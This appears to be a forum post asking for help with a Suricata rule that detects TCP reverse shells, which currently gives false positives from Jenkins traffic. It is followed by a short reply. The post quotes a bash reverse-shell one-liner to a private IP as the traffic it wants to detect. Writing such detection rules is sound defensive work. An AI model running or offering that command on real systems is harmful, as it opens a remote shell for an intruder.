TCP reverse shell detection

Hi guys,i’m trying to use suricata to detect tcp reverse shell actions such as:

/bin/bash -i 0>& /dec/tcp/192.168.111.222/333 0>&1

My rule looks like this:

alert tcp any any -> any any (msg:"TCP reverse shell detection."; flow: established; pcre:"/root@.+(#|$)/i"; tcp.hdr; offset: 20; depth: 4; content:"|01 01 08 0a|"; sid: 1; rev: 1;)

Sometimes it really takes effect,at the same time it results in a significant number of false positives.I collected some pcaps and Jenkins turn out to be the culprit.

[root@localhost demo]# docker build -t demo:2.0 .
Sending build context to Docker daemon  17.57MB
Step 1/4 : FROM openjdk:8-jdk-alpine
 ---> a3562aa0b991
Step 2/4 : VOLUME /tmp
 ---> Using cache
 ---> a98cf1fbeb9d
Step 3/4 : ADD ./demojenkins.jar demojenkins.jar
 ---> 12bfc15e5295
Step 4/4 : ENTRYPOINT ['java','-jar','/demojenkins.jar', '&']
 ---> Running in 2908dd94dfa7
Removing intermediate container 2908dd94dfa7
 ---> 3041db93b6df
Successfully built 3041db93b6df
Successfully tagged demo:2.0

Could anyone give me some advice,appreciate it.

Might help to capture the traffic and inspect the pcap to see if the traffic pattern in the rule is present.